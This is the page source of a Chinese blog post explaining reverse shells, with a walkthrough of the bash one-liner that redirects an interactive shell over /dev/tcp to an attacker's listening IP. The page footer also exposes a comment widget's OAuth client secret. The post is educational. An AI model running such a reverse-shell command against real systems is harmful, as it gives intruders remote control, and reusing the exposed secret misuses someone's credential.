<!doctype html><html lang=zh>
<head><meta http-equiv=content-type content="text/html" charset=utf-8>
<meta http-equiv=x-ua-compatible content="IE=edge,chrome=1">
<meta name=viewport content="width=device-width,initial-scale=1">
<link rel=stylesheet href="/css/tailwind.min.b39a406edef2cbbd2ccee2cbd368a787bfad3ac016440c2b37558902050cf85d.css" integrity="sha256-s5pAbt7yy70szuLL02inh7+tOsAWRAwrN1WJAgUM+F0=">
<link rel=preconnect href=https://fonts.googleapis.com>
<link rel=preconnect href=https://fonts.gstatic.com crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Fira+Code&family=Lora&display=swap" rel=stylesheet>
<script src=https://kit.fontawesome.com/9cc9e9e3f3.js crossorigin=anonymous></script>
<link rel=stylesheet href=https://cdn.jsdelivr.net/npm/docsearch.js@2.6.3/dist/cdn/docsearch.min.css><title>反弹 Shell 小记</title>
</head>
<body class="flex flex-col">
<header class="flex fixed bg-white w-full p-4 font-title text-xl border-b"><div class="logo flex-1">
<a href=/ class=font-title>Forgotten Land</a>
</div>
<nav class="flex-initial ml-4">
<div id=归档 class=inline>
<a href=/metapages/archive/ class="mx-2 hover:text-blue-200">归档</a>
</div>
<div id=分类 class=inline>
<a href=/categories/ class="mx-2 hover:text-blue-200">分类</a>
<div class=absolute>
</div>
</div>
<div id=标签 class=inline>
<a href=/tags/ class="mx-2 hover:text-blue-200">标签</a>
</div>
<div id=关于 class=inline>
<a href=/metapages/about/ class="mx-2 hover:text-blue-200">关于</a>
</div>
</nav>
</header>
<div class="flex-grow mt-24">
<div class=flex>
<div class="md:w-4/5 lg:w-2/3 max-w-screen-lg mx-auto lg:mr-0 p-4 shadow-2xl">
<h1 class="font-title text-4xl text-center mb-4">反弹 Shell 小记</h1>
<div class="flex justify-center font-mono">
<div class="mr-6 flex-none">
<i class="fas fa-calendar mr-1"></i>
<span>2021-04-19</span>
</div>
<div class="mr-6 flex-none">
<i class="fas fa-clock mr-1"></i>
<span>阅读时长约 3 分钟</span>
</div>
</div>
<article id=content class="content mb-4 p-4">
<h2 id=基本原理>基本原理</h2>
<p>首先是Shell，广义的Shell可以认为是一个应用程序，这个程序提供了与操作系统和其他应用程序交互的功能这样一种服务；操作系统shell可以分为CLI和GUI两种形式的。</p>
<p>而很多情况下，会在接触某种CLI时接触到Shell，所以也经常会混淆两者的概念，即认为Shell就是命令行接口，而且很多情境下都可以说得通，所以这个概念暂且不重要。</p>
<p>一般情况下连接都是由客户端发起，一个所谓的正向的shell连接同样是由客户端发起。这种情况下目标服务器会进行监听，攻击者可以连接到目标来得到shell：<img src=https://causality-blog.oss-cn-hangzhou.aliyuncs.com/hugo/posts/tech/reverseShell/image-20210426085855100.png alt=image-20210426085855100></p>
<p>但是很多情况下无法创建这样一个连接，原因在于：服务其防火墙可能阻止外部连接；服务器的ip可能被隐藏，无法直接连接。</p>
<p>所以为了解决这个问题，可以考虑使用反向连接。</p>
<h2 id=反弹shell>反弹shell</h2>
<p>反弹shell，其核心就是建立一个反向的连接，同时使得attacker可以使用连接执行shell命令。然而，如果只是在victim端建立一个普通的连接是没什么用的，因为这种情况下将attacker作为服务器，其向victim发送的内容只是作为标准输出。也就是说，这种情况下并没有“弹”回一个shell。</p>
<p>所以，想要创建一个反弹shell的连接，关键点有两个：</p>
<ol>
<li>attacker执行监听，有victim发送连接请求；</li>
<li>attacker发送的内容可以被victim的shell执行。</li>
</ol>
<p>第一点就是建立一个反向连接，这一点很简单；第二点则相对麻烦，因为victim作为client端收到的数据被作为标准输出使用；因此，需要做的是想办法将收到的数据作为shell的输入，然后将shell输出的内容发送出去。</p>
<p>基于这个逻辑，也就知道了从哪个方向去考虑构造一个反弹shell的连接。</p>
<ol>
<li>victim 向 attacker 建立连接</li>
<li>victim 将 attacker 的输入作为命令执行，执行结果发送到 attacker</li>
</ol>
<h3 id=使用bash构建一个反弹shell>使用bash构建一个反弹shell</h3>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash>bash -i &gt;&amp; /dev/tcp/192.168.131.131/1230 0&gt;&amp;<span style=color:#ae81ff>1</span>
</code></pre></div><p>这条命令看起来很简单，但是涉及到的内容还不少，在完全理解这个命令只想，需要首先理解文件描述符和重定向。</p>
<blockquote>
<p><a href=https://causality.top/devops/linux/bash-redirect/>重定向</a></p>
<p>>&表示将标准输入和标准错误输入合并重定向，等价于 >file 2>&1</p>
<p>0>&1 等价于 0&lt;&1，含义为标准输出重定向到输入</p>
</blockquote>
<blockquote>
<p>文件描述符，使用 0 表示stdin，1表示stdout，2表示stderr</p>
<p>/dev/tcp/host/port 表示尝试建立一个tcp socket连接</p>
<p>/dev/udp/host/port 表示尝试建立一个udp socket连接</p>
</blockquote>
<p>现在来简单分析这条命令，首先是<code>bash -i</code>命令，这个命令的<code>-i</code>参数的含义时启动一个交互式bash，之后是<code>>&</code>表示将stdout和stderr合并重定向，<code>/dev/tcp/192.168.131.131/1230</code>表示向目标建立tcp socket连接，所以bash的输出都会被重定向到目标，也就是attacker；之后<code>0>&1</code>，也就是将收到的内容重定向到标准输入，这就意味着attacker输入的内容会被bash是为标准输入，所以命令将会被执行。</p>
<p>可以看出，这条命令就符合反弹shell的要求：</p>
<ol>
<li>通过 /dev/tcp/host/port 建立一个连接</li>
<li>使用 >& 将输出发送到 attacker，使用0>&1将attacker输入的内容作为命令执行</li>
</ol>
<p><img src=https://causality-blog.oss-cn-hangzhou.aliyuncs.com/hugo/posts/tech/reverseShell/image-20210426105941773.png alt=image-20210426105941773></p>
</article>
<div class="flex justify-between mt-12 mx-8 font-title text-xl">
<div class=flex-initial>
<a href=https://causality.top/misc/tech/font-family/ class=hover:text-blue-200>上一篇：Font Family</a>
</div>
<div class=flex-initial>
<a href=https://causality.top/security/tools/nc/ class=hover:text-blue-200>下一篇：Netcat 小记</a>
</div>
</div>
<link rel=stylesheet href=https://unpkg.com/gitalk/dist/gitalk.css>
<script src=https://unpkg.com/gitalk/dist/gitalk.min.js></script>
<div id=gitalk></div>
<script>var gitalk=new Gitalk({clientID:'9a04c6b451fbce76511d',clientSecret:'430c540c77ecd6b59749c60f0341c057bd5320a0',repo:'Causa1ity.github.io',owner:'Causa1ity',admin:'Causa1ity',id:'security/notes/reverse-shell',distractionFreeMode:!1});gitalk.render('gitalk')</script>
</div>
<div class="flex-initial hidden lg:block ml-4 mr-auto">
<div class=fixed>
<div class=font-serif>
<nav id=TableOfContents>
<ul>
<li><a href=#基本原理>基本原理</a></li>
<li><a href=#反弹shell>反弹shell</a>
<ul>
<li><a href=#使用bash构建一个反弹shell>使用bash构建一个反弹shell</a></li>
</ul>
</li>
</ul>
</nav>
</div>
</div>
</div>
</div>
</div>
<footer class=flex-auto><div class="font-title text-center my-4">
<p class=text-lg>
Powered By <a href=https://gohugo.io>Hugo</a>
</p>
</div>
</footer>
</body>
</html>